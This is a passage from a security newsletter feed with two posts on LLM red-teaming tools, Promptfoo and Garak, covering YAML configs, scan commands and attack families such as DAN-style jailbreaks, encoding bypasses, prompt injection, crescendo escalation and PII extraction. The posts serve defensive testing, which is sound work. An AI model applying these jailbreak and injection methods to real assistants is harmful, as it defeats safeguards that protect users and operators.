15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>TL;DR:</strong> Promptfoo is an open-source CLI for evaluating and red teaming LLM apps. YAML config, 50+ attack plugins, built-in OWASP LLM Top 10 presets, and a web UI that shows exactly where your model broke. OpenAI acquired the company in March 2026, terms undisclosed. It stays MIT licensed and open source. One command generates hundreds of adversarial test cases and scores them automatically.</p><blockquote><p>Recon&#8217;s free. If you want the tradecraft, upgrade.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h3>Why Promptfoo Is the Red Team Tool Your Dev Team Will Actually Use</h3><p>Security tools that only security people run don&#8217;t stop bugs from shipping. They catch bugs after the damage is done. The tool that stops a vulnerable LLM from hitting production is the one that sits in the build pipeline and blocks the deploy.</p><p>Promptfoo is that tool. It&#8217;s a CLI and Node.js library for evaluating and red teaming LLM applications. YAML-configured, CI/CD-native, and designed for the developer workflow: define your target, pick your plugins, run the scan, read the web UI. The red team mode auto-generates adversarial prompts using 50+ attack plugins across prompt injection, jailbreaks, PII leakage, SSRF, SQL injection, excessive agency, hallucination, and more. It ships with OWASP LLM Top 10 presets, NIST AI RMF mappings, and MITRE ATLAS coverage. One line in your config enables an entire compliance framework&#8217;s worth of testing.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!6ADY!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe9cc587f-556a-47de-a415-21c59a777a84_985x652.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!6ADY!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe9cc587f-556a-47de-a415-21c59a777a84_985x652.png 424w, https://substackcdn.com/image/fetch/$s_!6ADY!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe9cc587f-556a-47de-a415-21c59a777a84_985x652.png 848w, https://substackcdn.com/image/fetch/$s_!6ADY!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe9cc587f-556a-47de-a415-21c59a777a84_985x652.png 1272w, https://substackcdn.com/image/fetch/$s_!6ADY!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe9cc587f-556a-47de-a415-21c59a777a84_985x652.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!6ADY!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe9cc587f-556a-47de-a415-21c59a777a84_985x652.png" width="985" height="652" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/e9cc587f-556a-47de-a415-21c59a777a84_985x652.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:652,&quot;width&quot;:985,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:42670,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/193714884?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe9cc587f-556a-47de-a415-21c59a777a84_985x652.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!6ADY!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe9cc587f-556a-47de-a415-21c59a777a84_985x652.png 424w, https://substackcdn.com/image/fetch/$s_!6ADY!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe9cc587f-556a-47de-a415-21c59a777a84_985x652.png 848w, https://substackcdn.com/image/fetch/$s_!6ADY!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe9cc587f-556a-47de-a415-21c59a777a84_985x652.png 1272w, https://substackcdn.com/image/fetch/$s_!6ADY!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe9cc587f-556a-47de-a415-21c59a777a84_985x652.png 1456w" sizes="100vw"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>The pedigree: 10.4k GitHub stars, 350,000+ developers, 130,000 active monthly users, and adoption at 25% of Fortune 500 companies. OpenAI and Anthropic both ran it internally before <a href="https://openai.com/index/openai-to-acquire-promptfoo/">OpenAI acquired the company on March 9, 2026</a>. Acquisition terms were undisclosed, though Promptfoo had been valued at $86 million at its July 2025 Series A. The repo stays open source under MIT and lives at github.com/promptfoo/promptfoo.</p><p>The difference between Promptfoo and the other tools in this space: your dev team will actually adopt it. YAML configs live in your repo. Results render in a browser. CI/CD integration means red teaming runs on every PR. No Python notebooks, no manual orchestration, no &#8220;let the security team handle it.&#8221; Security shifts left to where the code is written. <a href="https://www.toxsec.com/p/garak-llm-vulnerability-scanner">Garak gives us the broad CLI sweep across known probe families</a>. <a href="https://www.toxsec.com/p/pyrit-ai-red-teaming">PyRIT runs the surgical multi-turn follow-up</a>. Promptfoo is the one that sits in the pipeline and blocks the merge.</p><blockquote><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/p/promptfoo-red-teaming?utm_source=substack&utm_medium=email&utm_content=share&action=share&quot;,&quot;text&quot;:&quot;Share&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/p/promptfoo-red-teaming?utm_source=substack&utm_medium=email&utm_content=share&action=share"><span>Share</span></a></p></blockquote><h3>Plugins, Strategies, and the YAML That Runs It All</h3><p>Three concepts drive Promptfoo&#8217;s red team architecture.</p><p><strong>Plugins</strong> generate adversarial inputs targeting specific vulnerability classes. <code>harmful</code> generates prompts that attempt to elicit dangerous content. <code>jailbreak</code> tests guardrail bypass resistance. <code>hijacking</code> checks whether an attacker can redirect the model&#8217;s behavior. <code>pii:direct</code>, <code>pii:session</code>, and <code>pii:social</code> test for PII leakage through different vectors. <code>ssrf</code>, <code>sql-injection</code>, <code>shell-injection</code> test for the exact agent-level attacks that bounty programs pay for. Framework presets bundle related plugins: <code>owasp:llm</code> enables the full OWASP LLM Top 10 suite. <code>owasp:agentic</code> covers the newer OWASP Top 10 for AI Agents.</p><p><strong>Strategies</strong> determine how those adversarial inputs get delivered. <code>prompt-injection</code> wraps payloads in injection frames. <code>jailbreak</code> applies <a href="https://www.toxsec.com/p/dan-prompts-for-guardrail-bypass">DAN-style bypass techniques</a>. <code>crescendo</code> runs multi-turn escalation where each message builds on the last. These are the same attack patterns we&#8217;ve been stacking against guardrails manually, except Promptfoo automates the generation and delivery.</p><p>The YAML config ties everything together.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;yaml&quot;,&quot;nodeId&quot;:&quot;2d799992-66de-453d-97e7-b88a976b7b57&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-yaml"># promptfooconfig.yaml
targets:
  - id: openai:gpt-4o
    label: customer-service-bot

  # Or hit your own endpoint:
  - id: 'https://api.yourapp.com/chat'
    config:
      method: 'POST'
      headers:
        'Content-Type': 'application/json'
      body:
        message: '{{prompt}}'
      transformResponse: 'json.response'

redteam:
  purpose: &gt;
    Customer service chatbot for an airline.
    Users can check flight status, book tickets,
    and manage reservations.
  plugins:
    - owasp:llm          # Full OWASP LLM Top 10
    - harmful
    - pii
    - ssrf
    - excessive-agency
  strategies:
    - jailbreak
    - prompt-injection
    - crescendo</code></pre></div><p>That config scans your chatbot across every OWASP LLM Top 10 category, tests for PII exposure, checks for SSRF, and applies three different delivery strategies to each attack. The <code>purpose</code> field matters. Promptfoo uses it to generate contextually relevant adversarial prompts. An airline chatbot gets probes about frequent flyer data and booking system access. A healthcare app gets probes about patient records and HIPAA violations.</p><p>Run it:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:&quot;3ea5070e-9fe1-4a8a-9351-934aac1eef09&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">npm install -g promptfoo
promptfoo redteam init my-scan --no-gui
# Edit promptfooconfig.yaml with the config above
promptfoo redteam run</code></pre></div><p>Generation takes about five minutes. The scan runs every generated test case against your target, grades each response using an LLM judge, and renders the results in a web UI. Red means it broke. Green means it held. Click any finding to see the exact adversarial prompt, the model&#8217;s response, and the grader&#8217;s reasoning.</p><h3>The Promptfoo Report Card You Can&#8217;t Argue With</h3><p>Here&#8217;s what makes Promptfoo dangerous for complacent teams. The web UI generates a compliance report card. <a href="https://www.toxsec.com/p/owasp-top-10-for-genai">OWASP LLM Top 10</a>, NIST AI RMF, MITRE ATLAS. Each framework&#8217;s relevant controls mapped to your scan results. Green checkmarks where you passed. Red flags where you failed. Severity ratings. Evidence trails.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!VnCM!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2b436ed5-d46e-47ac-9fa9-6faf9c5edc5f_955x627.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!VnCM!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2b436ed5-d46e-47ac-9fa9-6faf9c5edc5f_955x627.png 424w, https://substackcdn.com/image/fetch/$s_!VnCM!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2b436ed5-d46e-47ac-9fa9-6faf9c5edc5f_955x627.png 848w, https://substackcdn.com/image/fetch/$s_!VnCM!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2b436ed5-d46e-47ac-9fa9-6faf9c5edc5f_955x627.png 1272w, https://substackcdn.com/image/fetch/$s_!VnCM!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2b436ed5-d46e-47ac-9fa9-6faf9c5edc5f_955x627.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!VnCM!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2b436ed5-d46e-47ac-9fa9-6faf9c5edc5f_955x627.png" width="955" height="627" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/2b436ed5-d46e-47ac-9fa9-6faf9c5edc5f_955x627.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:627,&quot;width&quot;:955,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:44747,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/193714884?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2b436ed5-d46e-47ac-9fa9-6faf9c5edc5f_955x627.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!VnCM!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2b436ed5-d46e-47ac-9fa9-6faf9c5edc5f_955x627.png 424w, https://substackcdn.com/image/fetch/$s_!VnCM!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2b436ed5-d46e-47ac-9fa9-6faf9c5edc5f_955x627.png 848w, https://substackcdn.com/image/fetch/$s_!VnCM!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2b436ed5-d46e-47ac-9fa9-6faf9c5edc5f_955x627.png 1272w, https://substackcdn.com/image/fetch/$s_!VnCM!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2b436ed5-d46e-47ac-9fa9-6faf9c5edc5f_955x627.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Your chatbot just failed three OWASP categories across 23 individual test cases. The <code>prompt-injection</code> plugin found that jailbreak-wrapped requests bypass your system prompt 40% of the time. The <code>pii</code> plugin extracted customer email addresses through a social engineering frame. The <code>excessive-agency</code> plugin got the model to attempt API calls it shouldn&#8217;t have access to.</p><p>All documented. All reproducible. All sitting in a web dashboard your engineering manager can read without knowing what a jailbreak is. That&#8217;s the part that changes behavior. Security findings buried in JSONL logs get ignored. Security findings rendered in a color-coded dashboard with OWASP mappings get fixed.</p><p>And every finding has a timestamp, a conversation transcript, and a grader explanation. That&#8217;s your bounty submission evidence. That&#8217;s your compliance audit trail. That&#8217;s the artifact your CISO shows the board when they ask &#8220;how do we know our AI is secure?&#8221;</p><blockquote><p>Behind the wall: steps you can take right now, a field-ready security prompt, and a checklist for operators. Upgrade now.</p></blockquote>
      <p>
          <a href="https://www.toxsec.com/p/promptfoo-red-teaming">
              Read more
          </a>
      </p>
   ]]></content:encoded></item><item><title><![CDATA[Garak Vulnerability Scanner: Nessus for LLMs]]></title><description><![CDATA[Point it at a model. Pick your probes. Watch every guardrail break in JSONL.]]></description><link>https://www.toxsec.com/p/garak-llm-vulnerability-scanner</link><guid isPermaLink="false">https://www.toxsec.com/p/garak-llm-vulnerability-scanner</guid><dc:creator><![CDATA[ToxSec]]></dc:creator><pubDate>Wed, 06 May 2026 13:31:30 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!wOGj!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5b7c9ebd-9765-42b5-8259-e03a2bb2d743_2752x1536.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!wOGj!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5b7c9ebd-9765-42b5-8259-e03a2bb2d743_2752x1536.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!wOGj!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5b7c9ebd-9765-42b5-8259-e03a2bb2d743_2752x1536.png 424w, https://substackcdn.com/image/fetch/$s_!wOGj!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5b7c9ebd-9765-42b5-8259-e03a2bb2d743_2752x1536.png 848w, https://substackcdn.com/image/fetch/$s_!wOGj!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5b7c9ebd-9765-42b5-8259-e03a2bb2d743_2752x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!wOGj!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5b7c9ebd-9765-42b5-8259-e03a2bb2d743_2752x1536.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!wOGj!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5b7c9ebd-9765-42b5-8259-e03a2bb2d743_2752x1536.png" width="2752" height="1536" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/5b7c9ebd-9765-42b5-8259-e03a2bb2d743_2752x1536.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1536,&quot;width&quot;:2752,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:7298228,&quot;alt&quot;:&quot;Garak NVIDIA LLM vulnerability scanner tutorial showing probes detectors generators and CLI output for AI security testing and bug bounty.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/193694931?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1a127658-a233-48ce-8017-a46617c303ab_2752x1536.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Garak NVIDIA LLM vulnerability scanner tutorial showing probes detectors generators and CLI output for AI security testing and bug bounty." title="Garak NVIDIA LLM vulnerability scanner tutorial showing probes detectors generators and CLI output for AI security testing and bug bounty." srcset="https://substackcdn.com/image/fetch/$s_!wOGj!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5b7c9ebd-9765-42b5-8259-e03a2bb2d743_2752x1536.png 424w, https://substackcdn.com/image/fetch/$s_!wOGj!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5b7c9ebd-9765-42b5-8259-e03a2bb2d743_2752x1536.png 848w, https://substackcdn.com/image/fetch/$s_!wOGj!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5b7c9ebd-9765-42b5-8259-e03a2bb2d743_2752x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!wOGj!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5b7c9ebd-9765-42b5-8259-e03a2bb2d743_2752x1536.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>TL;DR:</strong> Garak is NVIDIA&#8217;s open-source LLM vulnerability scanner. Point it at a model, pick your probes, and it fires hundreds of known attack patterns across prompt injection, jailbreaks, encoding bypasses, data leakage, and toxicity. CLI-first, plugin-based, fast. Your model just failed 47 probes across six categories. Now what?</p><blockquote><p>This is the public feed. Upgrade to see what doesn&#8217;t make it out.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h3>What Is Garak and Why You Run It First</h3><p>Nobody ships a web app without running a vulnerability scanner against it first. Nikto, Nessus, nuclei. Pick your poison, point it at the target, let it rip through known attack patterns, then read the report. LLMs ship without this step every single day.</p><p>Garak fixes that. The Generative AI Red-teaming and Assessment Kit is <a href="https://github.com/NVIDIA/garak">NVIDIA&#8217;s open-source LLM vulnerability scanner</a>, built by their AI Red Team and backed by a research paper, 7.5k GitHub stars, and an active Discord. The latest stable release is v0.14.1, shipped April 2026, so the project is actively maintained and shipping. The tool probes your model&#8217;s defenses while looking completely benign.</p><p>The workflow is simple. Install. Point it at a model. Pick probes (or let it pick all of them). Garak fires every probe, runs each prompt multiple times to account for the model&#8217;s stochastic output, scores responses through detectors, and writes a structured JSONL report. One command, hundreds of attack vectors, a complete audit trail.</p><p>Garak covers the attack categories that matter: prompt injection, <a href="https://www.toxsec.com/p/dan-prompts-for-guardrail-bypass">DAN-family jailbreaks</a>, encoding-based guardrail bypasses, data leakage, package hallucination (the <a href="https://www.toxsec.com/p/what-is-slopsquatting-ai-hallucinations">slopsquatting</a> vector), toxicity generation, malware generation attempts, cross-site scripting through LLM output, hallucination, and <a href="https://www.toxsec.com/p/token-level-ai-security-the-opus">glitch token exploitation</a>. 37+ probe modules, each containing multiple individual probes. The dan module alone ships with about fifteen scannable variants spanning DAN 6.0 through 11.0, plus STAN, DUDE, AntiDAN, and ChatGPT Developer Mode. The encoding module covers Base64, Base16, Base32, ROT13, Morse, Braille, ASCII85, hex, and more.</p><p>Think of Garak as Nessus before the pentest. We&#8217;re mapping the attack surface. Which probes get through. Which get blocked. Where the filters are soft. That scan data tells us where to aim our manual prompt injection chains. And once Garak flags the broken families, <a href="https://www.toxsec.com/p/pyrit-ai-red-teaming">PyRIT picks up the deep, adaptive multi-turn follow-up</a>.</p><h3>Generators, Probes, and Detectors: The Three Moving Parts</h3><p>Garak&#8217;s architecture has three components that matter.</p><p><strong>Generators</strong> are our connection to the target. OpenAI API, Hugging Face (pipeline and inference), AWS Bedrock, Cohere, Groq, Mistral, Ollama for local models, NVIDIA NIM endpoints, Replicate, LiteLLM, and custom REST APIs. If the model accepts text over an API, Garak can hit it.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:&quot;97b97e50-ffe5-4fa1-8e60-feb92943db67&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash"># Scan an OpenAI model for encoding-based injection
export OPENAI_API_KEY="sk-[REDACTED]"
python3 -m garak --target_type openai --target_name gpt-5-nano --probes encoding

# Scan a local Ollama model for DAN jailbreaks
python3 -m garak --target_type ollama --target_name llama3 --probes dan

# Scan a Hugging Face model for everything
python3 -m garak --target_type huggingface --target_name meta-llama/Llama-3-8b --probes all</code></pre></div><p><strong>Probes</strong> generate the attack payloads. Each probe module targets a specific vulnerability class and contains multiple individual prompts. Garak sends each prompt to the model ten times by default. Ten generations per prompt. That repetition matters because LLM output is non-deterministic. A model that refuses a jailbreak nine times out of ten still has a 10% bypass rate, and that 10% is a finding worth documenting.</p><p>The probe taxonomy maps directly to known vulnerability classes. promptinject implements the Agency Enterprise PromptInject framework for hijacking attacks. dan runs the full DAN family. encoding tests whether the same encoding stacks we use manually scale up to automation. leakreplay and knownbadsignatures check for training data extraction and malware signature generation. packagehallucination tests whether the model invents package names that don&#8217;t exist on PyPI or npm.</p><p><strong>Detectors</strong> evaluate the output. Simple string matching for known bad signatures. Classifier-based detection using small models for toxicity scoring. LLM-as-judge for nuanced cases. Each probe ships with a primary detector and optional extended detectors. A probe fires, the model responds, the detector scores pass or fail, and the result hits the JSONL log.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!sSq-!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F95e0aa5f-7fe8-44d4-b978-87debb503a56_1083x926.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!sSq-!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F95e0aa5f-7fe8-44d4-b978-87debb503a56_1083x926.png 424w, 